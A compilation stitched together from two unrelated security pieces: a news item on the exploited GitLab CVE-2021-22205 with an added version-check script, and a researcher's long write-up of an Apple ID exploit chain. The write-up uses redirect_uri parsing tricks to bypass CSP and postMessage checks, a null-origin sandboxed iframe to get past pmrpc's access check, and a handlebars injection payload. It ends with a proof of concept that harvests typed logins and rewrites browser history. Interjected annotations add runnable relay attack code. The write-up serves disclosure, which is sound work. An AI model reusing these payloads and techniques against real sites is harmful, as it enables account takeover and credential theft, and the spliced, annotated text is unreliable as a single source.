1. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, leaving a large number of internet-facing GitLab instances open to attack.

Tracked as CVE-2021-22205, the issue stems from improper validation of user-provided images, resulting in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, was addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3.

In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions.

Although the flaw was initially deemed a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021, owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday.

Despite the patches having been publicly available for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible.

"In addition, ideally, GitLab should not be an internet-facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here.

Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
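Given the patch figures above, a quick self-audit is to compare an instance's reported version against the fixed releases. The following is a minimal sketch, not from the article: it assumes Node 18+ (global fetch), and GITLAB_URL / GITLAB_TOKEN are placeholders you must supply. /api/v4/version is GitLab's standard, authenticated version endpoint.

    // Sketch: check a GitLab instance's version against the CVE-2021-22205 fixes.
    const GITLAB_URL = "https://gitlab.example.com"; // hypothetical host
    const TOKEN = process.env.GITLAB_TOKEN;          // an API token with read access

    const fixed = [[13, 8, 8], [13, 9, 6], [13, 10, 3]];

    function isVulnerable([maj, min, patch]) {
      if (maj < 11 || (maj === 11 && min < 9)) return false;  // predates the bug (fixed from 11.9)
      if (maj > 13 || (maj === 13 && min > 10)) return false; // newer than every fixed series
      for (const [fMaj, fMin, fPatch] of fixed)
        if (maj === fMaj && min === fMin) return patch < fPatch; // patched series: compare patch level
      return true; // an affected series with no patched release
    }

    fetch(`${GITLAB_URL}/api/v4/version`, { headers: { "PRIVATE-TOKEN": TOKEN } })
      .then((r) => r.json())
      .then(({ version }) => {
        const v = version.split(".").map((s) => parseInt(s, 10)); // "13.10.2-ee" -> [13, 10, 2]
        console.log(version, isVulnerable(v) ? "vulnerable to CVE-2021-22205" : "patched");
      });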
2. Everyone knows what's inside a computer isn't really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn't. In the real world, everything has a certain mooring we're all attuned to. You put money in a big strong safe, and, most likely, if it somehow opens there will be a big sound and a big hole. Everything has a footprint, everything has a size, there are always side-effects.

As the electrons wiggle, they're expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they'd dance, but that's not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense. The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It's easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you're careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that's why I've always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole.

Before the pandemic, I spent a lot of time researching the way the web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the 'Desktop Application', the consequences of which I summarised one sunny day in Miami. I'm not really a very good security researcher, so little of my work sees the light of day because the words don't always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I'll tell you about now. But I can't tell you about those. Perhaps naïvely, it hadn't occurred to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID.

At the time, Apple didn't have any formal way of paying you for bugs: you just emailed them and hoped for the best. Maybe you'd get something, maybe you wouldn't — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me.

Part 1: The Doorman's Secret

Computer systems don't tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That's down to a basic rule of the web: different websites don't share information with each other by default.

iCloud, then, is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple's usual apple.com, yet its core feature is of course logging into your Apple iCloud account.
More interestingly still, you might notice that most login systems for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud's doesn't. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address:

https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest

Here, Apple is using OAuth 2, a capability-based authentication framework. 'Capability-based' is key here, because it means that a login from apple.com doesn't necessarily equate to one from icloud.com, and not all iCloud logins are necessarily the same either — that's how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page; response_mode=web_message seems to be the switch that turns this on.

If you visit the address, you'll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page, they could play around with its presentation to steal Apple user data (a 'redress attack'). Apple's code detects that it's not being put in the right place and blanks out the page.

In typical OAuth, the 'redirect_uri' specifies where the access is being sent. In a normal, secure flow, the redirect_uri gets checked against what's registered for the other parameter, 'client_id', to make sure that it's safe for Apple to send the special keys that grant access there — but here, there's no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page.

In a twist of fate, this one fell prey to a bug similar to the one from 'how to hack the uk tax system, i guess', which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. To bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome DevTools, I found that a redirect_uri of 'https://abc@www.icloud.com' would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is: how do we get the iCloud login page into our page?
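Before tackling that, to see why 'https://abc@www.icloud.com' counts as "the same thing", you can ask the standard URL parser directly. A quick console check (mine, not the article's) — it works in a browser console or in Node, both of which implement the WHATWG URL parser:

    const u = new URL("https://abc@www.icloud.com");
    console.log(u.username); // "abc" — parsed as userinfo, not part of the host
    console.log(u.origin);   // "https://www.icloud.com"
    // Any check that properly parses the URL sees a plain www.icloud.com origin,
    // while software that handles the string naively may see something else.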
Consult this reference on embed control:

X-Frame-Options: DENY
Prevents any kind of embedding.
pros: ancient, everyone supports it
cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic

X-Frame-Options: ALLOW-FROM http://example.com
Only allows embedding from a specific place.
pros: a really good idea from a security perspective
cons: was literally only supported by Firefox and Internet Explorer for a short time, so using it will probably make you less secure

Content-Security-Policy: frame-ancestors
Only allows embedding from specific place(s).
pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls
cons: probably very old browsers will ignore it

If you check Chrome DevTools' 'network' panel, you will find the AppleID sign-on page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing) and Content-Security-Policy: frame-ancestors. Here's a cut-down version of what the Content-Security-Policy header looks like when 'redirect_uri' is set to the default "https://www.icloud.com/":

Content-Security-Policy: frame-ancestors 'self' https://www.icloud.com

This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@www.icloud.com?

Content-Security-Policy: frame-ancestors 'self' https://abc@www.icloud.com

Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to 'https://mywebsite.com;@www.icloud.com/'; the AppleID server continues to think all is well, but sends:

Content-Security-Policy: frame-ancestors 'self' https://mywebsite.com;@www.icloud.com

This is because the 'URI' language that's used to express web addresses is contextually different from the language used to express Content Security Policies. 'https://mywebsite.com;@www.icloud.com' is a totally valid URL, meaning the same as 'https://www.icloud.com', but to Content-Security-Policy the same statement means 'https://mywebsite.com' and then some extra garbage which gets ignored after the ';'. Using this, we can embed the Apple ID login page in our own page.

However, not everything is quite as it seems. Normally, if you fail to embed a page in Chrome, you get a cute lil broken-page guy; but instead, we get a big box of absolutely nothing.

Part 2: Communicating with the blank box

Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message:
{"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"}

This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig into the client code itself to work out the context of the error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to 'https://idmsa.apple.com/appleauth/jslog', presumably to report to Apple that an error occurred. Chrome DevTools' 'sources' panel has a component on the right called "XHR/fetch Breakpoints" which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to step backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there's this:

new Promise(function(e, n) {
    it.call({
        destination: window.parent,
        publicProcedureName: "ready",
        params: [{
            iframeTitle: d.a.getString("iframeTitle")
        }],
        onSuccess: function(t) { e(t) },
        onError: function(t) { n(t) },
        retries: p.a.meta.FEConfiguration.pmrpcRetryCount,
        timeout: p.a.meta.FEConfiguration.pmrpcTimeout,
        destinationDomain: p.a.destinationDomain
    })
})

The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready, and failing over and over (see: retries). This communication is happening over postMessage (the 'pm' of pmrpc). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com; then, since our embedding page is not that domain, there's a failure.

We can inject code into the AppleID JavaScript and the iCloud JavaScript to view their version of this conversation:

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["ready"],"id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2"}
AppleID tells iCloud it's ready to receive messages.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2","result":true}
iCloud responds to the ping request with a 'pong' response.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"ready","params":[{"iframeTitle":"Sign In with Your Apple ID"}],"id":"E0236187-9F33-42BC-AD1C-4F3866803C55"}
AppleID tells iCloud that the frame is named 'Sign in with Your Apple ID' (I'm guessing to make the title of the page correct).

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"E0236187-9F33-42BC-AD1C-4F3866803C55","result":true}
iCloud acknowledges receipt of the title.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["config"],"id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD"}
AppleID asks iCloud if it wants the login to be configured.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD","result":true}
iCloud acknowledges receipt of the configuration request, and says that yes, it does want the login to be configured.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"config","params":[],"id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B"}
AppleID asks iCloud for a login dialog configuration.
iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ … ]ErkJggg==","width":"100px"}}}}
iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption "Sign in to iCloud", and, for example, whether a link should be provided for if the user forgets their password.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":true}
AppleID confirms receipt of the login configuration.

In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here.

Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can't just impersonate iCloud, by having every postMessage carry a targetOrigin — a specified destination origin for the message. It's not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going to the wrong place.

Part 3: Snot-Nosed Kid Mode

This one isn't as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri, through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary.

By placing a breakpoint at the destinationDomain line we had before, we can see that, unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, 'https://mywebsite.com;@www.icloud.com', is being passed to postMessage, as though it were this code:

window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com");

At first, this seems like an absolute impasse. In no possible way is our page going to be at the address 'https://mywebsite.com;@www.icloud.com'. However, once you go from the reference documentation to the technical specification, the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this:

Let parsedURL be the result of running the URL parser on targetOrigin.
If parsedURL is failure, then throw a "SyntaxError" DOMException.
Set targetOrigin to parsedURL's origin.

Crucially, despite "https://mywebsite.com;@www.icloud.com" being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this gives us purchase to sneak some extra content in there to potentially confuse other parts of AppleID's machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login:

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com");

This information eventually bubbles down to the destinationDomain we're trying to mess with.
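You can watch the spec's step 5 happen from a console. This little check (mine, not the article's) shows how the same string means different things to the URL parser and to a Content-Security-Policy header:

    const weird = "https://mywebsite.com;@www.icloud.com";
    // postMessage runs targetOrigin through the URL parser, per the spec:
    console.log(new URL(weird).origin); // "https://www.icloud.com"
    // But in a CSP header, ';' terminates the frame-ancestors directive, so the
    // same characters read as the source "https://mywebsite.com" followed by an
    // unknown (and therefore ignored) directive named "@www.icloud.com".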
When toying with 'redirect_uri', I found that there's a bug in the way this functionality is programmed in Apple's server. For an input 'https://mywebsite.com;"@www.icloud.com' (note the double quote), this code is produced:

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com");

The double quote is 'escaped' with a '\' to ensure that we don't break out of the quoted section and start executing our own code. However, something a little odd happens when we instead input 'https://mywebsite.com;%22@www.icloud.com'. '%22' is what you get from 'encodeURIComponent' of a double quote — the opposite of what Apple is doing here.

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com");

We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before the value even reaches this generated JavaScript. Then, the generated JavaScript performs the same decoding again. Someone made the mistake of doing the same decoding on both the client and the server, but it never became a functionality-breaking bug because the intended usage doesn't have any doubly encoded components. We can, however, introduce these. 😉

Because the server is using the once-decodeURIComponent-ed form, and the client is using the twice-decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to:

https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com

This order of operations then happens (reproduced as a runnable sketch after this list):

1. AppleID's server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com
2. AppleID's server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com, and gets https://www.icloud.com, which passes the first security check.
3. AppleID's server takes the once-decodeURIComponent-ed form and sends: Content-Security-Policy: frame-ancestors https://mywebsite.com%3F mywebsite.com;@www.icloud.com
4. The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both 'https://mywebsite.com%3f' (which is nonsense) and 'mywebsite.com' (which is us!!!!). This passes the second security check and allows the page to continue loading.
5. AppleID's server generates the sign-in page with the JavaScript: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com%3F mywebsite.com;@www.icloud.com");
6. The second decodeURIComponent sets bootData.destinationDomain to: https://mywebsite.com? mywebsite.com;@www.icloud.com
7. When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com
8. The browser, when performing postMessage, parses an origin yet again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com. The '?' causes everything after it to be ignored, resulting in the target origin 'https://mywebsite.com'. This passes the third security check.

However, this is only half of our problems, and our page will stay blank. Here's what a blank page looks like, for reference:

Part 4: Me? I'm Nobody.

Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is totally different from the one used for a postMessage send.
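Here is that decode chain as the promised console sketch (mine; the values are the ones from the article):

    const redirect_uri =
      "https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com";

    const serverView = decodeURIComponent(redirect_uri);
    console.log(serverView);
    // "https://mywebsite.com%3F mywebsite.com;@www.icloud.com"
    // -> the server's origin parse sees https://www.icloud.com (check #1 passes)

    const clientView = decodeURIComponent(serverView);
    console.log(clientView);
    // "https://mywebsite.com? mywebsite.com;@www.icloud.com"
    // -> the '?' truncates the postMessage targetOrigin at our own site:
    console.log(new URL(clientView).origin); // "https://mywebsite.com"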
The lowest-level browser mechanism that AppleID must inevitably be calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this:

if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!");

This is just a 'strict string comparison', which means that we would, in theory, have to somehow be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com, which has no chance of ever happening on God's green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by 'processJSONRpcRequest', defined in 'pmrpc.js'. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows:

254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin)

This checks a value called 'shouldCheckACL' to determine if security is disabled, I guess 😉 That value, in turn, comes from line 221:

221: shouldCheckACL : !isWorkerComm

And then isWorkerComm comes to us via lines 205–206:

205: var eventSource = eventParams.source;
206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null;

'eventParams' is the event representing the postMessage, and 'event.source' is a reference to the window (i.e. page) that sent the message. I'd summarise this check as follows:

if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com"))

That means the origin check is completely skipped if message.source is 'null'. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message, its 'source' can then be set to 'null', and then you no longer need to worry about security getting in the way.

Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event's source is always a 'WindowProxy object', so it can never be 'null' instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag, 'allow-same-origin', which, if not present in a sandboxed iframe, sets the 'sandboxed origin browsing context flag' (defined in section 7.5.3), which 'forces the content into a unique origin' (defined in section 7.5.5), which makes the window an 'opaque origin' (defined in section 7.5), which, when given to JavaScript, is turned into null (!!!!).

This means that when we create an embedded, sandboxed frame, as long as we don't provide the 'allow-same-origin' flag, we create a special window that is considered to be null, and thus bypasses the pmrpc security check on received messages. A 'null' page, however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID, with all the hard work we did before, and a 'null' page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which, receiving them from a 'null' window, assumes it must have generated them itself. You can read my reference implementation of this forwarding code, here; a rough sketch of the setup follows below.

Part 5: More than Phishing

Now that AppleID thinks we're iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials?
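The sketch mentioned above: roughly how Part 4's null-window relay could be wired up. This is my own hedged reconstruction, not the author's code (his reference implementation is linked in the article); the frame names, layout, and the assumption that the AppleID iframe is the parent's first child frame are all mine.

    <!-- attacker page: the AppleID embed plus a sandboxed relay frame -->
    <iframe src="https://idmsa.apple.com/appleauth/auth/authorize/signin?..."></iframe>

    <!-- no allow-same-origin: the relay gets an opaque origin, so (per Part 4)
         pmrpc sees its messages as coming from a 'null' source and skips the ACL -->
    <iframe name="relay" sandbox="allow-scripts" srcdoc='
      <script>
        window.addEventListener("message", function (e) {
          // forward whatever the attacker page hands us on to AppleID,
          // assumed here to be the first child frame of the parent
          parent.frames[0].postMessage(e.data, "*");
        });
      </script>
    '></iframe>

    <script>
      // send pmrpc traffic to AppleID via the relay instead of directly
      function sendToAppleID(msg) {
        frames["relay"].postMessage(msg, "*");
      }
    </script>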
In our current state, having tricked Apple ID into thinking that we're iCloud, we have a little box that fills in your Apple email very nicely. When you log in to our embed, we get an authentication for your Apple account over postMessage — even if you don't pass 2FA! This is because an authentication token is granted without 2FA for iCloud 'Find My', used for finding your potentially lost phone (for which you might otherwise need to pass 2FA).

However, this is basically phishing — and although it is extremely high-tech phishing, I have no doubt the powers that be would argue that you could just make a fake AppleID page just the same. We need more.

We're already in a position of extreme privilege. Apple ID thinks we're iCloud, so it's likely that our interactions with the Apple ID system will be a lot more trusting of what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed:

pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}}

That's all well and good, but what about the options that iCloud can use but simply chooses not to? They won't be here, but we can use Chrome DevTools' 'code search' feature to search all the code the Apple ID client software uses. 'signInLabel' makes a good search term, as it probably doesn't turn up anywhere else:

d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel),

It looks like all of these settings like 'signInLabel' are part of this 'envConfigFromConsumer', so we can search for that:

this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test"))
d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()),
n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)),
n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)),
n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)),
n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)),
n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)),
n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")),
n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())),
i = d()(w.a, "envConfigFromConsumer.verificationToken", ""),

These values we know from our config get given different names to put into a template. For example, 'envConfigFromConsumer.features.footer' becomes 'showFooter'.
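For readers squinting at the minified code: d()(obj, path, fallback) appears to behave like a lodash-style get(). This toy re-implementation (mine, an assumption about the minified helper) shows how the consumer-supplied config flows into template attributes:

    // A guess at what the minified d()(...) helper does: read a nested value
    // by dot-path, falling back to a default when it's absent.
    function get(obj, path, fallback) {
      const value = path.split(".").reduce((o, key) => (o == null ? o : o[key]), obj);
      return value === undefined ? fallback : value;
    }

    // e.g. the consumer-supplied config decides whether the footer shows:
    const w = { a: { envConfigFromConsumer: { features: { footer: true } } } };
    console.log(get(w.a, "envConfigFromConsumer.features.footer", false)); // true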
In DevTools' network panel, we can search all resources (code and otherwise) the page uses for where these inputs end up:

{{#if showRememberMe}}
<div class="si-remember-password">
    <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked">
    <label id="remember-me-label" class="form-label" for="remember-me">
        <span class="form-choice-indicator"></span>
        {{rememberMeText}}
    </label>
</div>

What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret: '{{value}}' statements work like you expect, safely putting content into the page; but '{{{value}}}' extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let's see if an Apple engineer made a typo by searching the templates for "}}}":

{{#if showLearnMoreLink}}
<div>
    {{{learnMoreLink}}}
</div>
{{/if}}
{{#if showPrivacy}}
<div class="label-small text-centered centered tk-caption privacy-wrapper">
    <div class="privacy-icon"></div>
    {{{privacyText}}}
</div>
{{/if}}

Perfect! From our previous research, we know that 'privacyText' comes from the configuration option 'envConfigFromConsumer.privacy', or just 'privacy'. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" }, Apple ID will execute our code and show a little popup indicating what domain we have taken over.

Part 6: Overindulgence

Now it's time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn't scary enough. We have control over idmsa.apple.com, the browser client of the Apple ID server, and so we can access all the credentials saved there — your Apple login and cookie — and, in theory, we can 'jump' to other Apple login windows. Those credentials are all stored in a form that we can use to take over an Apple account, but they're not a username and password. That's what I think of as scary. For my proof of concept, I:

1. Execute my full exploit chain to take over Apple ID. This requires only one click from the user.
2. Present the user with a 'login with AppleID' button by deleting all the content of the Apple ID login page and replacing it with the standard button.
3. Open a new window to the real, full Apple ID login page, same as Apple would when the button is clicked.
4. With our control of idmsa.apple.com, take control of the real Apple ID login dialog and inject our own code, which harvests the logins as they are typed.
5. Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page — if the user checks whether they came from a legitimate Apple site, they'll just see apple.com and be unable to go back.

Full commented source code can be found here.

Video demonstration of the Proof of Concept on desktop.

Although I started this project before Apple had its bug bounty program, I reported it just as the bug bounty program started, and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I'm trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access "a small amount of sensitive data". Hopefully other researchers are paid more! I also hope this was an interesting read!
I took a really long time to write this, with the pandemic kind of sapping my energy, and it is my sincere hope that, despite the technical complexity here, I've written something accessible to those new to security.

Thomas

Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of Fame 🥺🥺 The full timeline follows this article.

edit: Apple says my Hall of Fame will happen in September!
edit: September is almost over and it hasn't happened!

Timeline

Report to fix time: 3 days
Fix to offer time: 4 months, 3 days
Payment offer to payment time: 4 months, 5 days
Total time: 8 months, 8 days

Friday, November 15th 2019: First Apple bug, an XSS on apple.com, reported.
Saturday, November 16th 2019: Issues noticed in Apple ID. The previous bug I reported has been mitigated, but no email from Apple about it.
Thursday, November 21st 2019, 3:43AM GMT: First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple users' information.
Thursday, November 21st 2019, 6:06AM GMT: Templated response from Apple, saying they're looking into it.
Thursday, November 21st 2019, 8:20PM GMT: Provided first Apple ID proof of concept which injects malicious code, along with some video documentation.
Sunday, November 24th 2019: The issue is mitigated (partially fixed) by Apple.
Thursday, November 28th 2019: Ask for updates.
Tuesday, December 3rd 2019: Apple tells me there is nothing to share with me.
